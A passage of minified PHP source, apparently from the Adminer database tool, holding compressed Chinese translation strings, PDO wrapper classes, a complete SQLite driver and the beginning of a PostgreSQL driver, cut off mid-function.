R܈f1BC\r9ܘAZ8B<N(4=9%3.sd|4ʠPx3:xW6(\rux<4xD5:T6JXD #h6mz:xBR-4\r\"872&\r6\n\\,[/S*˳2h KFt @IV\rC-c!0<!@I>I`0ԒEql6?6+l\n)ݕ0*#*anRRvTDܰE^N(]>lNM4 I/+|t&\n#TP ton\rlw P\r41\\J\"r?;(h [,*]XIE\\T]RҏN]?ה7Cbs57=i˱Y#{5d݃x3P#pʥ> qZc\nH:(\"KpI7 ` \"J3@s&q\$!N-\r CL h)BR bDt*é.PB(ҙ :<.O9\"ʌDžb'\$|ӻYd6Z\nTJS*TrVJ+urX!aUHgYk5gaI\$\$պASkݫ \"A.=͠2F>i @rq\"~a\$t-P @54G'd.R\\? \\+VHuLH.\0욅أ?ԕQtR~\nŕD\\TC~ypԀÀRKI/y]asHe5cu\nVȚ+\nz뗴@8K\"P&dBKxP L*@#g VIə-QKDFrTPB?0:Iy>qI*%7`%(д]M*Ժ{9)((rd\\ʇǑRR*1djM* 'y3V6~a:%SYDB&1v#Xk1'`(@jaEYGjlP)ܱ&L]\04Was.\nSJ9H/eOK! ZhJH2ptX6\"zВ)n]KʰLlbzLSeYqiQly1\$ԛj0dd|s`m(oL2PI4*N(W1ŰfEeYq1+N35]q՛**&rN~03JÖ+\$'K.W/E.J͝%S\"LiKڥor=:joA*@DŒ>7BHu\\&(D!vN>DIuLwT#P\$<(K-8DQ5rH@ \n\"H*殁KFA(\$2H&dYٺ\r*E}_B֮Ц\"{+q\rM=BFL92+LDy2ݯQR8eاM2.PӄHnt9\"X\nPʻTx4\$K(aАHXpa\r-7/%\\rn(JJ32\\Y%&afMB.\"Kᨊ֗FbX(%GigI(Q݁7r;\na\rVșd܂J.-9Pr3pc|4M]I.=7{؋zgc`ߩ#ԑ?pK>Dkp3se>+{zdudk\\>yҦRx1#A%[_~.MO\$Ij\n])缋o`ʹ>Ipo) k/D{eC&I|\\8<DpeLvt6:c,Ȳ0NaFkD0` lBan.^z_ojs@g\$O l(p ϧbe,tAN7 `dn>\"FHh-\ny\"Ik G~1P>/ZN\$zp4d0f\"\05d)Nu /`bdz)bJni\n𨆇P\nydIQNqQ+ C=\"IG6MbHG:ΐaY\$¥4>ϢՑP1OK M8HohOi+L_P5~5bw VaFC&ڎC#h9® Q!w\"Ą X*9\$k]CZ\0]LPiV>\rC>aJ -\0~jh~eA(\$\nn/N4BN\nZ`PQ.S@|e\n'zBQQo/tL(U7(f6\\g6dQNu-1p2`yBUnrG#G\r0'&h箊HnGH7Br|(|LXiƠlꥂө'sVC~cx j&1:L*<#х8|If&-Sn7⬨LDDlk<\n =Bw\$ s{@+_@p'14qa,\$:S5dgCF* ";break;case"zh":$f="^s\\r|%:\$\nr.2r/dȻ[8 S8r!T\\sI4brЀJs!KdueVDX,#!j6 :t\nrU:.ZPˑ.\rVWd^%䌵rTԼ*s#U`Qdu'c(oFe3Nb`p2NSӣ:LYta~&6ۊrsk{fqw-\n2#*B!@LNzШ@F:QQWs~r.ndJXˊ;.M(bxd*bKaLK#sXg)<<&q>sKtF>D!zH\$C*re^N.=9f](r\\E Lɰ:A^CJ\n]k!3vs 5px0#3:xC6(\ru(<5cp4D4:Of0XD #hύ|4uZ7#L9&\r-[jtIE1+%|sӂI1(\\9\r\"p.Q`re՝3!&tIdnKEeACOUQPrDGB\$0`:UeY{gcDH i N夒g1i^iXc/Aȑx5jO!8)PG6\"6T\r*9u@a )\"oIr6oQ4meTJnllSLg1:ARxG)au&L~.udeHLkT,3eڜJ=\"\r@1m3b!\07`4n0y-{F\rëVaOXĤ@@!b\$!DFYH rvE`n4Yab4>/4M!Շ#3ØwR*2Sd;SPjCujR*MJu2/SQ*@DbUJW+d\n4+}k2̨j@!/(\"t\n!VBEy.İs\0-N,(+ӂr'@(#Hb>4\"\n9() Qjf1[XK20\$ԛ09c-@`\\Dˣ^v&r5' 7@aXƵJ\05ƌ8<mI=\0¤L(8PD~C@YS*Pɚ5)a2\rfw A303#HiUEI1AFQGH%{5+\nrxNT(@-(A\"L@Z#ΧäJ)ɌT띒#0D`\\*.ꠋSؤhoͼI\$i1;ZKoSˣQ*ZrGYQ )U^Zt\$<Ѿz'b\"F>CP(\\&ෲAwKi Ǎt0C1gv!'D%CK^\\&ʛB[Q]rZ.dktPvKE!B(WE+=}Դ tAbs^#-S!]=?'`9U}T*Q:De|4\\X')仮=x <d=O @WXB]#\$j\n{>X*O1!|+L(_Iw9,E w,B(\nQ=)W;q#R\nŁ6\n\n\n1hd}sHT\"H([Q'0ebBeqG.1G0'`W՜U9fCMGۯ wD\\vV3a]ϵ6\rɗY&Ă]I4.6@úb_Hw]w>ݛmku%rC]\niZ7 iUᰟ\\K_l~8vnUҲl*Ŝvm\\NUy.LX8Ճo\\tsXՑO7';O\r;T_ݡsү+@(~#!:pBz:o}*:# Kcr@UpNtHȔ৺OV>Єk9ha2{Aeȗ\nHi/7\\K.D|'<8LtΝ GRr^~E\r.JB\"X͠ XzT>~}rLg\"q|÷\r=^BlOvzK9^v\0%/\0e|oNOm\0r\"0+澯[@dpJO+-ӄ^F/vKAop3P&0v.`йpzpA>n;jjJ<)p-\n\"l\"c\n䒂H(Q26 H\nh25P\n.Ɂ]az̠1\rV\r`@Sb.5hWnXjpb`Ċh\nZ\0@RÚ6J0O#B8Y% a!(m-V8l/Q9pífj!j䒓\r9*\0\r\"2R6\"Z!\0.E[\$|md,HzXI@M\nd3F2P)\rEDF<\\IN-܍o+\$.^C-, \r0,岼!q&\$!jF:& .zhN`@ \0t @\n`";break;case"zh-tw":$f="^%ӕ\\r|%u:HB(\\4prneRQ̡D8 S\nt*.tI&GNAʤSV: t%9Sy:\"<rST,#!j61uL\0U:.I9BK&]\nDX[}-,r&a;Dxr4&)s3St\rAbEE1ԣg:x]#0, (4\rGqZS )ЪOLP\0Δ:}ryZse\\BABs @2*bPr\n*.OcD\nt\$O-1*\\CJY.RDLGI,II@Hő[)r_ Ko')tUw/ax].J2ft(qWк̤UvY`\\\nsS,2D49Ax^;p2\r9x3(N\r9#}>5#\r620#pH84m<:xAEt\r#RՎlЦ(K`\$ qdDyRPa s-a~WġrGALKIsZ\$POd\\S%,N&%So1UY+hP\"P6\00lZVZCQqld1H\nY N(Kq]g1G9{}q%)2PQ7\n-B\$o)n\$PKpcbY)\"^)Dqrr7)wy/vI5ÿM1<[pYXiW/6r[Ĝ_/7O7SoPTquid8L(UL3e,OC\rX!\0Qӎc66\rxacR9y0!Ԩ:DBib#X]<>DY!iO9DB\" >]\02!M*PZ\"9_0@BS\"Cs6Bj40PJC(rIJ)e0T\nR*`^\rUWbժW*^hX0pR,7+uM_1@\"@cJdH@cf\$Q^9x~a@\$*AH0BR`J\"j90Q-ĸ'憇0IN'?(%59DPB\$`@]d\r+1Ւ16AE\n\0fA6\0cl,6Jx7MI5StxS\n\nF PMe\nU:q\"b\"&/2b+H1əVcRn љDB0T\nl>enΜ3rfT-Xr:Dh)bP\$~p \n@\"@UH\"S[/GG6UV92[\ri2Ap);xüx g\\E8<^RJa\n&E!vkR7\"jdH&P\"!It\nʈBUimA9H.B \0rRKH93!dN5FB.H[\015Dε(.ЦC#s8>G\r c6s _t4Z z\r,Uh(w)btHrĔ9|X|9А\".kTǧt)~:[!1\$<1\0(yZ-a颎Atvض3ڈB\"U8*F(36汬'(\">:\\<@y-ØxKϠ/ED6ؤs92W.rB#z@(0f!DtK5JÝ'8gi:dsa'cؖ#*\r\n96\0K¡ s٬]f.´Q\n[[5> L.BpA0&\rQP:D;|3,5{#MCZ:zY,֚ۀ،\0_ew8!wz:X+G-@\$(z-A槯^m2%lʤHs5'[BP #k\nYpgؙ]a\nmj3M/.`z<G, vΊ{vGᎬ=C4НsO)@|9滽f9 HaAP}Tu^ yQ`9Dտt\reJ\0@]2<%9R ]BPO_1N@t4{B]yQIo&8vK̀8o\0fnα\n/LP[,p:!\"'|Bǐ\\¢RB[P(6LnEpz^|*P^%6DDΜK̳#)Nj5as /\n{O<pq ]00alB,nK\rRN\rͅĐ\"qp\rFdjFs\0000>>DPC\\ R\r\".hdrFJ͍6\0g P4RAmHZF.z%b(0@B.fۀTR@C^R\nh316n?a1\"c\"`@iܵ@L>d#byE\r y7@:C4|\np<q:Ct>F#B8gjDQ1[.\r9ބvÐrM)iF;-F\r&:# h}%43C\\6+F.gmz*)N2N&nrjbZ\"\nn4P2\r*(ng^p@oLaffj%*&-Ґڡ,\"\0 \rX\0g<trL\$]]\\-Ob<ҚC1\nk#4j<ҫ*h!%#lG\0 \0t @\n`";break;}$Ih=array();foreach(explode("\n",lzw_decompress($f))as$X)$Ih[]=(strpos($X,"\t")?explode("\t",$X):$X);return$Ih;}if(!$Ih){$Ih=get_translations($ca);$_SESSION["translations"]=$Ih;}if(extension_loaded('pdo')){class
Min_PDO
extends
PDO{var$_result,$server_info,$affected_rows,$errno,$error;function
__construct(){global$b;$Ef=array_search("SQL",$b->operators);if($Ef!==false)unset($b->operators[$Ef]);}function
dsn($dc,$V,$G){try{parent::__construct($dc,$V,$G);}catch(Exception$vc){auth_error(h($vc->getMessage()));}$this->setAttribute(13,array('Min_PDOStatement'));$this->server_info=@$this->getAttribute(4);}function
query($H,$Sh=false){$I=parent::query($H);$this->error="";if(!$I){list(,$this->errno,$this->error)=$this->errorInfo();return
false;}$this->store_result($I);return$I;}function
multi_query($H){return$this->_result=$this->query($H);}function
store_result($I=null){if(!$I){$I=$this->_result;if(!$I)return
false;}if($I->columnCount()){$I->num_rows=$I->rowCount();return$I;}$this->affected_rows=$I->rowCount();return
true;}function
next_result(){if(!$this->_result)return
false;$this->_result->_offset=0;return@$this->_result->nextRowset();}function
result($H,$o=0){$I=$this->query($H);if(!$I)return
false;$K=$I->fetch();return$K[$o];}}class
Min_PDOStatement
extends
PDOStatement{var$_offset=0,$num_rows;function
fetch_assoc(){return$this->fetch(2);}function
fetch_row(){return$this->fetch(3);}function
fetch_field(){$K=(object)$this->getColumnMeta($this->_offset++);$K->orgtable=$K->table;$K->orgname=$K->name;$K->charsetnr=(in_array("blob",(array)$K->flags)?63:0);return$K;}}}$Yb=array();class
Min_SQL{var$_conn;function
__construct($g){$this->_conn=$g;}function
select($R,$M,$Z,$cd,$df=array(),$z=1,$E=0,$Mf=false){global$b,$x;$Ed=(count($cd)<count($M));$H=$b->selectQueryBuild($M,$Z,$cd,$df,$z,$E);if(!$H)$H="SELECT".limit(($_GET["page"]!="last"&&+$z&&$cd&&$Ed&&$x=="sql"?"SQL_CALC_FOUND_ROWS ":"").implode(", ",$M)."\nFROM ".table($R),($Z?"\nWHERE ".implode(" AND ",$Z):"").($cd&&$Ed?"\nGROUP BY ".implode(", ",$cd):"").($df?"\nORDER BY ".implode(", ",$df):""),($z!=""?+$z:null),($E?$z*$E:0),"\n");$Vg=microtime(true);$J=$this->_conn->query($H);if($Mf)echo$b->selectQuery($H,format_time($Vg));return$J;}function
delete($R,$Vf,$z=0){$H="FROM ".table($R);return
queries("DELETE".($z?limit1($H,$Vf):" $H$Vf"));}function
update($R,$O,$Vf,$z=0,$Dg="\n"){$ji=array();foreach($O
as$y=>$X)$ji[]="$y = $X";$H=table($R)." SET$Dg".implode(",$Dg",$ji);return
queries("UPDATE".($z?limit1($H,$Vf):" $H$Vf"));}function
insert($R,$O){return
queries("INSERT INTO ".table($R).($O?" (".implode(", ",array_keys($O)).")\nVALUES (".implode(", ",$O).")":" DEFAULT VALUES"));}function
insertUpdate($R,$L,$Kf){return
false;}function
begin(){return
queries("BEGIN");}function
commit(){return
queries("COMMIT");}function
rollback(){return
queries("ROLLBACK");}}$Yb["sqlite"]="SQLite 3";$Yb["sqlite2"]="SQLite 2";if(isset($_GET["sqlite"])||isset($_GET["sqlite2"])){$Hf=array((isset($_GET["sqlite"])?"SQLite3":"SQLite"),"PDO_SQLite");define("DRIVER",(isset($_GET["sqlite"])?"sqlite":"sqlite2"));if(class_exists(isset($_GET["sqlite"])?"SQLite3":"SQLiteDatabase")){if(isset($_GET["sqlite"])){class
Min_SQLite{var$extension="SQLite3",$server_info,$affected_rows,$errno,$error,$_link;function
__construct($Kc){$this->_link=new
SQLite3($Kc);$mi=$this->_link->version();$this->server_info=$mi["versionString"];}function
query($H){$I=@$this->_link->query($H);$this->error="";if(!$I){$this->errno=$this->_link->lastErrorCode();$this->error=$this->_link->lastErrorMsg();return
false;}elseif($I->numColumns())return
new
Min_Result($I);$this->affected_rows=$this->_link->changes();return
true;}function
quote($Q){return(is_utf8($Q)?"'".$this->_link->escapeString($Q)."'":"x'".reset(unpack('H*',$Q))."'");}function
store_result(){return$this->_result;}function
result($H,$o=0){$I=$this->query($H);if(!is_object($I))return
false;$K=$I->_result->fetchArray();return$K[$o];}}class
Min_Result{var$_result,$_offset=0,$num_rows;function
__construct($I){$this->_result=$I;}function
fetch_assoc(){return$this->_result->fetchArray(SQLITE3_ASSOC);}function
fetch_row(){return$this->_result->fetchArray(SQLITE3_NUM);}function
fetch_field(){$d=$this->_offset++;$U=$this->_result->columnType($d);return(object)array("name"=>$this->_result->columnName($d),"type"=>$U,"charsetnr"=>($U==SQLITE3_BLOB?63:0),);}function
__desctruct(){return$this->_result->finalize();}}}else{class
Min_SQLite{var$extension="SQLite",$server_info,$affected_rows,$error,$_link;function
__construct($Kc){$this->server_info=sqlite_libversion();$this->_link=new
SQLiteDatabase($Kc);}function
query($H,$Sh=false){$ye=($Sh?"unbufferedQuery":"query");$I=@$this->_link->$ye($H,SQLITE_BOTH,$n);$this->error="";if(!$I){$this->error=$n;return
false;}elseif($I===true){$this->affected_rows=$this->changes();return
true;}return
new
Min_Result($I);}function
quote($Q){return"'".sqlite_escape_string($Q)."'";}function
store_result(){return$this->_result;}function
result($H,$o=0){$I=$this->query($H);if(!is_object($I))return
false;$K=$I->_result->fetch();return$K[$o];}}class
Min_Result{var$_result,$_offset=0,$num_rows;function
__construct($I){$this->_result=$I;if(method_exists($I,'numRows'))$this->num_rows=$I->numRows();}function
fetch_assoc(){$K=$this->_result->fetch(SQLITE_ASSOC);if(!$K)return
false;$J=array();foreach($K
as$y=>$X)$J[($y[0]=='"'?idf_unescape($y):$y)]=$X;return$J;}function
fetch_row(){return$this->_result->fetch(SQLITE_NUM);}function
fetch_field(){$C=$this->_result->fieldName($this->_offset++);$Af='(\\[.*]|"(?:[^"]|"")*"|(.+))';if(preg_match("~^($Af\\.)?$Af\$~",$C,$B)){$R=($B[3]!=""?$B[3]:idf_unescape($B[2]));$C=($B[5]!=""?$B[5]:idf_unescape($B[4]));}return(object)array("name"=>$C,"orgname"=>$C,"orgtable"=>$R,);}}}}elseif(extension_loaded("pdo_sqlite")){class
Min_SQLite
extends
Min_PDO{var$extension="PDO_SQLite";function
__construct($Kc){$this->dsn(DRIVER.":$Kc","","");}}}if(class_exists("Min_SQLite")){class
Min_DB
extends
Min_SQLite{function
__construct(){parent::__construct(":memory:");}function
select_db($Kc){if(is_readable($Kc)&&$this->query("ATTACH ".$this->quote(preg_match("~(^[/\\\\]|:)~",$Kc)?$Kc:dirname($_SERVER["SCRIPT_FILENAME"])."/$Kc")." AS a")){parent::__construct($Kc);return
true;}return
false;}function
multi_query($H){return$this->_result=$this->query($H);}function
next_result(){return
false;}}}class
Min_Driver
extends
Min_SQL{function
insertUpdate($R,$L,$Kf){$ji=array();foreach($L
as$O)$ji[]="(".implode(", ",$O).")";return
queries("REPLACE INTO ".table($R)." (".implode(", ",array_keys(reset($L))).") VALUES\n".implode(",\n",$ji));}}function
idf_escape($u){return'"'.str_replace('"','""',$u).'"';}function
table($u){return
idf_escape($u);}function
connect(){return
new
Min_DB;}function
get_databases(){return
array();}function
limit($H,$Z,$z,$D=0,$Dg=" "){return" $H$Z".($z!==null?$Dg."LIMIT $z".($D?" OFFSET $D":""):"");}function
limit1($H,$Z){global$g;return($g->result("SELECT sqlite_compileoption_used('ENABLE_UPDATE_DELETE_LIMIT')")?limit($H,$Z,1):" $H$Z");}function
db_collation($m,$ob){global$g;return$g->result("PRAGMA encoding");}function
engines(){return
array();}function
logged_user(){return
get_current_user();}function
tables_list(){return
get_key_vals("SELECT name, type FROM sqlite_master WHERE type IN ('table', 'view') ORDER BY (name = 'sqlite_sequence'), name",1);}function
count_tables($l){return
array();}function
table_status($C=""){global$g;$J=array();foreach(get_rows("SELECT name AS Name, type AS Engine FROM sqlite_master WHERE type IN ('table', 'view') ".($C!=""?"AND name = ".q($C):"ORDER BY name"))as$K){$K["Oid"]=1;$K["Auto_increment"]="";$K["Rows"]=$g->result("SELECT COUNT(*) FROM ".idf_escape($K["Name"]));$J[$K["Name"]]=$K;}foreach(get_rows("SELECT * FROM sqlite_sequence",null,"")as$K)$J[$K["name"]]["Auto_increment"]=$K["seq"];return($C!=""?$J[$C]:$J);}function
is_view($S){return$S["Engine"]=="view";}function
fk_support($S){global$g;return!$g->result("SELECT sqlite_compileoption_used('OMIT_FOREIGN_KEY')");}function
fields($R){global$g;$J=array();$Kf="";foreach(get_rows("PRAGMA table_info(".table($R).")")as$K){$C=$K["name"];$U=strtolower($K["type"]);$Mb=$K["dflt_value"];$J[$C]=array("field"=>$C,"type"=>(preg_match('~int~i',$U)?"integer":(preg_match('~char|clob|text~i',$U)?"text":(preg_match('~blob~i',$U)?"blob":(preg_match('~real|floa|doub~i',$U)?"real":"numeric")))),"full_type"=>$U,"default"=>(preg_match("~'(.*)'~",$Mb,$B)?str_replace("''","'",$B[1]):($Mb=="NULL"?null:$Mb)),"null"=>!$K["notnull"],"privileges"=>array("select"=>1,"insert"=>1,"update"=>1),"primary"=>$K["pk"],);if($K["pk"]){if($Kf!="")$J[$Kf]["auto_increment"]=false;elseif(preg_match('~^integer$~i',$U))$J[$C]["auto_increment"]=true;$Kf=$C;}}$Tg=$g->result("SELECT sql FROM sqlite_master WHERE type = 'table' AND name = ".q($R));preg_match_all('~(("[^"]*+")+|[a-z0-9_]+)\s+text\s+COLLATE\s+(\'[^\']+\'|\S+)~i',$Tg,$ke,PREG_SET_ORDER);foreach($ke
as$B){$C=str_replace('""','"',preg_replace('~^"|"$~','',$B[1]));if($J[$C])$J[$C]["collation"]=trim($B[3],"'");}return$J;}function
indexes($R,$h=null){global$g;if(!is_object($h))$h=$g;$J=array();$Tg=$h->result("SELECT sql FROM sqlite_master WHERE type = 'table' AND name = ".q($R));if(preg_match('~\bPRIMARY\s+KEY\s*\((([^)"]+|"[^"]*")++)~i',$Tg,$B)){$J[""]=array("type"=>"PRIMARY","columns"=>array(),"lengths"=>array(),"descs"=>array());preg_match_all('~((("[^"]*+")+)|(\S+))(\s+(ASC|DESC))?(,\s*|$)~i',$B[1],$ke,PREG_SET_ORDER);foreach($ke
as$B){$J[""]["columns"][]=idf_unescape($B[2]).$B[4];$J[""]["descs"][]=(preg_match('~DESC~i',$B[5])?'1':null);}}if(!$J){foreach(fields($R)as$C=>$o){if($o["primary"])$J[""]=array("type"=>"PRIMARY","columns"=>array($C),"lengths"=>array(),"descs"=>array(null));}}$Ug=get_key_vals("SELECT name, sql FROM sqlite_master WHERE type = 'index' AND tbl_name = ".q($R),$h);foreach(get_rows("PRAGMA index_list(".table($R).")",$h)as$K){$C=$K["name"];$v=array("type"=>($K["unique"]?"UNIQUE":"INDEX"));$v["lengths"]=array();$v["descs"]=array();foreach(get_rows("PRAGMA index_info(".idf_escape($C).")",$h)as$ug){$v["columns"][]=$ug["name"];$v["descs"][]=null;}if(preg_match('~^CREATE( UNIQUE)? INDEX '.preg_quote(idf_escape($C).' ON '.idf_escape($R),'~').' \((.*)\)$~i',$Ug[$C],$gg)){preg_match_all('/("[^"]*+")+( DESC)?/',$gg[2],$ke);foreach($ke[2]as$y=>$X){if($X)$v["descs"][$y]='1';}}if(!$J[""]||$v["type"]!="UNIQUE"||$v["columns"]!=$J[""]["columns"]||$v["descs"]!=$J[""]["descs"]||!preg_match("~^sqlite_~",$C))$J[$C]=$v;}return$J;}function
foreign_keys($R){$J=array();foreach(get_rows("PRAGMA foreign_key_list(".table($R).")")as$K){$q=&$J[$K["id"]];if(!$q)$q=$K;$q["source"][]=$K["from"];$q["target"][]=$K["to"];}return$J;}function
view($C){global$g;return
array("select"=>preg_replace('~^(?:[^`"[]+|`[^`]*`|"[^"]*")* AS\\s+~iU','',$g->result("SELECT sql FROM sqlite_master WHERE name = ".q($C))));}function
collations(){return(isset($_GET["create"])?get_vals("PRAGMA collation_list",1):array());}function
information_schema($m){return
false;}function
error(){global$g;return
h($g->error);}function
check_sqlite_name($C){global$g;$Dc="db|sdb|sqlite";if(!preg_match("~^[^\\0]*\\.($Dc)\$~",$C)){$g->error=lang(21,str_replace("|",", ",$Dc));return
false;}return
true;}function
create_database($m,$nb){global$g;if(file_exists($m)){$g->error=lang(22);return
false;}if(!check_sqlite_name($m))return
false;try{$_=new
Min_SQLite($m);}catch(Exception$vc){$g->error=$vc->getMessage();return
false;}$_->query('PRAGMA encoding = "UTF-8"');$_->query('CREATE TABLE adminer (i)');$_->query('DROP TABLE adminer');return
true;}function
drop_databases($l){global$g;$g->__construct(":memory:");foreach($l
as$m){if(!@unlink($m)){$g->error=lang(22);return
false;}}return
true;}function
rename_database($C,$nb){global$g;if(!check_sqlite_name($C))return
false;$g->__construct(":memory:");$g->error=lang(22);return@rename(DB,$C);}function
auto_increment(){return" PRIMARY KEY".(DRIVER=="sqlite"?" AUTOINCREMENT":"");}function
alter_table($R,$C,$p,$Rc,$sb,$oc,$nb,$La,$wf){$di=($R==""||$Rc);foreach($p
as$o){if($o[0]!=""||!$o[1]||$o[2]){$di=true;break;}}$c=array();$mf=array();foreach($p
as$o){if($o[1]){$c[]=($di?$o[1]:"ADD ".implode($o[1]));if($o[0]!="")$mf[$o[0]]=$o[1][0];}}if(!$di){foreach($c
as$X){if(!queries("ALTER TABLE ".table($R)." $X"))return
false;}if($R!=$C&&!queries("ALTER TABLE ".table($R)." RENAME TO ".table($C)))return
false;}elseif(!recreate_table($R,$C,$c,$mf,$Rc))return
false;if($La)queries("UPDATE sqlite_sequence SET seq = $La WHERE name = ".q($C));return
true;}function
recreate_table($R,$C,$p,$mf,$Rc,$w=array()){if($R!=""){if(!$p){foreach(fields($R)as$y=>$o){$p[]=process_field($o,$o);$mf[$y]=idf_escape($y);}}$Lf=false;foreach($p
as$o){if($o[6])$Lf=true;}$bc=array();foreach($w
as$y=>$X){if($X[2]=="DROP"){$bc[$X[1]]=true;unset($w[$y]);}}foreach(indexes($R)as$Nd=>$v){$e=array();foreach($v["columns"]as$y=>$d){if(!$mf[$d])continue
2;$e[]=$mf[$d].($v["descs"][$y]?" DESC":"");}if(!$bc[$Nd]){if($v["type"]!="PRIMARY"||!$Lf)$w[]=array($v["type"],$Nd,$e);}}foreach($w
as$y=>$X){if($X[0]=="PRIMARY"){unset($w[$y]);$Rc[]=" PRIMARY KEY (".implode(", ",$X[2]).")";}}foreach(foreign_keys($R)as$Nd=>$q){foreach($q["source"]as$y=>$d){if(!$mf[$d])continue
2;$q["source"][$y]=idf_unescape($mf[$d]);}if(!isset($Rc[" $Nd"]))$Rc[]=" ".format_foreign_key($q);}queries("BEGIN");}foreach($p
as$y=>$o)$p[$y]=" ".implode($o);$p=array_merge($p,array_filter($Rc));if(!queries("CREATE TABLE ".table($R!=""?"adminer_$C":$C)." (\n".implode(",\n",$p)."\n)"))return
false;if($R!=""){if($mf&&!queries("INSERT INTO ".table("adminer_$C")." (".implode(", ",$mf).") SELECT ".implode(", ",array_map('idf_escape',array_keys($mf)))." FROM ".table($R)))return
false;$Oh=array();foreach(triggers($R)as$Mh=>$xh){$Lh=trigger($Mh);$Oh[]="CREATE TRIGGER ".idf_escape($Mh)." ".implode(" ",$xh)." ON ".table($C)."\n$Lh[Statement]";}if(!queries("DROP TABLE ".table($R)))return
false;queries("ALTER TABLE ".table("adminer_$C")." RENAME TO ".table($C));if(!alter_indexes($C,$w))return
false;foreach($Oh
as$Lh){if(!queries($Lh))return
false;}queries("COMMIT");}return
true;}function
index_sql($R,$U,$C,$e){return"CREATE $U ".($U!="INDEX"?"INDEX ":"").idf_escape($C!=""?$C:uniqid($R."_"))." ON ".table($R)." $e";}function
alter_indexes($R,$c){foreach($c
as$Kf){if($Kf[0]=="PRIMARY")return
recreate_table($R,$R,array(),array(),array(),$c);}foreach(array_reverse($c)as$X){if(!queries($X[2]=="DROP"?"DROP INDEX ".idf_escape($X[1]):index_sql($R,$X[0],$X[1],"(".implode(", ",$X[2]).")")))return
false;}return
true;}function
truncate_tables($T){return
apply_queries("DELETE FROM",$T);}function
drop_views($oi){return
apply_queries("DROP VIEW",$oi);}function
drop_tables($T){return
apply_queries("DROP TABLE",$T);}function
move_tables($T,$oi,$oh){return
false;}function
trigger($C){global$g;if($C=="")return
array("Statement"=>"BEGIN\n\t;\nEND");$u='(?:[^`"\\s]+|`[^`]*`|"[^"]*")+';$Nh=trigger_options();preg_match("~^CREATE\\s+TRIGGER\\s*$u\\s*(".implode("|",$Nh["Timing"]).")\\s+([a-z]+)(?:\\s+OF\\s+($u))?\\s+ON\\s*$u\\s*(?:FOR\\s+EACH\\s+ROW\\s)?(.*)~is",$g->result("SELECT sql FROM sqlite_master WHERE type = 'trigger' AND name = ".q($C)),$B);$Me=$B[3];return
array("Timing"=>strtoupper($B[1]),"Event"=>strtoupper($B[2]).($Me?" OF":""),"Of"=>($Me[0]=='`'||$Me[0]=='"'?idf_unescape($Me):$Me),"Trigger"=>$C,"Statement"=>$B[4],);}function
triggers($R){$J=array();$Nh=trigger_options();foreach(get_rows("SELECT * FROM sqlite_master WHERE type = 'trigger' AND tbl_name = ".q($R))as$K){preg_match('~^CREATE\\s+TRIGGER\\s*(?:[^`"\\s]+|`[^`]*`|"[^"]*")+\\s*('.implode("|",$Nh["Timing"]).')\\s*(.*)\\s+ON\\b~iU',$K["sql"],$B);$J[$K["name"]]=array($B[1],$B[2]);}return$J;}function
trigger_options(){return
array("Timing"=>array("BEFORE","AFTER","INSTEAD OF"),"Event"=>array("INSERT","UPDATE","UPDATE OF","DELETE"),"Type"=>array("FOR EACH ROW"),);}function
routine($C,$U){}function
routines(){}function
routine_languages(){}function
begin(){return
queries("BEGIN");}function
last_id(){global$g;return$g->result("SELECT LAST_INSERT_ROWID()");}function
explain($g,$H){return$g->query("EXPLAIN QUERY PLAN $H");}function
found_rows($S,$Z){}function
types(){return
array();}function
schemas(){return
array();}function
get_schema(){return"";}function
set_schema($yg){return
true;}function
create_sql($R,$La){global$g;$J=$g->result("SELECT sql FROM sqlite_master WHERE type IN ('table', 'view') AND name = ".q($R));foreach(indexes($R)as$C=>$v){if($C=='')continue;$J.=";\n\n".index_sql($R,$v['type'],$C,"(".implode(", ",array_map('idf_escape',$v['columns'])).")");}return$J;}function
truncate_sql($R){return"DELETE FROM ".table($R);}function
use_sql($k){}function
trigger_sql($R,$Zg){return
implode(get_vals("SELECT sql || ';;\n' FROM sqlite_master WHERE type = 'trigger' AND tbl_name = ".q($R)));}function
show_variables(){global$g;$J=array();foreach(array("auto_vacuum","cache_size","count_changes","default_cache_size","empty_result_callbacks","encoding","foreign_keys","full_column_names","fullfsync","journal_mode","journal_size_limit","legacy_file_format","locking_mode","page_size","max_page_count","read_uncommitted","recursive_triggers","reverse_unordered_selects","secure_delete","short_column_names","synchronous","temp_store","temp_store_directory","schema_version","integrity_check","quick_check")as$y)$J[$y]=$g->result("PRAGMA $y");return$J;}function
show_status(){$J=array();foreach(get_vals("PRAGMA compile_options")as$af){list($y,$X)=explode("=",$af,2);$J[$y]=$X;}return$J;}function
convert_field($o){}function
unconvert_field($o,$J){return$J;}function
support($Gc){return
preg_match('~^(columns|database|drop_col|dump|indexes|move_col|sql|status|table|trigger|variables|view|view_trigger)$~',$Gc);}$x="sqlite";$Rh=array("integer"=>0,"real"=>0,"numeric"=>0,"text"=>0,"blob"=>0);$Yg=array_keys($Rh);$Yh=array();$Ye=array("=","<",">","<=",">=","!=","LIKE","LIKE %%","IN","IS NULL","NOT LIKE","NOT IN","IS NOT NULL","SQL");$Zc=array("hex","length","lower","round","unixepoch","upper");$ed=array("avg","count","count distinct","group_concat","max","min","sum");$gc=array(array(),array("integer|real|numeric"=>"+/-","text"=>"||",));}$Yb["pgsql"]="PostgreSQL";if(isset($_GET["pgsql"])){$Hf=array("PgSQL","PDO_PgSQL");define("DRIVER","pgsql");if(extension_loaded("pgsql")){class
Min_DB{var$extension="PgSQL",$_link,$_result,$_string,$_database=true,$server_info,$affected_rows,$error;function
_error($rc,$n){if(ini_bool("html_errors"))$n=html_entity_decode(strip_tags($n));$n=preg_replace('~^[^:]*: ~','',$n);$this->error=$n;}function
connect($N,$V,$G){global$b;$m=$b->database();set_error_handler(array($this,'_error'));$this->_string="host='".str_replace(":","' port='",addcslashes($N,"'\\"))."' user='".addcslashes($V,"'\\")."' password='".addcslashes($G,"'\\")."'";$this->_link=@pg_connect("$this->_string dbname='".($m!=""?addcslashes($m,"'\\"):"postgres")."'",PGSQL_CONNECT_FORCE_NEW);if(!$this->_link&&$m!=""){$this->_database=false;$this->_link=@pg_connect("$this->_string dbname='postgres'",PGSQL_CONNECT_FORCE_NEW);}restore_error_handler();if($this->_link){$mi=pg_version($this->_link);$this->server_info=$mi["server"];pg_set_client_encoding($this->_link,"UTF8");}return(bool)$this->_link;}function
quote($Q){return"'".pg_escape_string($this->_link,$Q)."'";}function
select_db($k){global$b;if($k==$b->database())return$this->_database;$J=@pg_connect("$this->_string dbname='".addcslashes($k,"'\\")."'",PGSQL_CONNECT_FORCE_NEW);if($J)$this->_link=$J;return$J;}function
close(){$this->_link=@pg_connect("$this->_string dbname='postgres'");}function
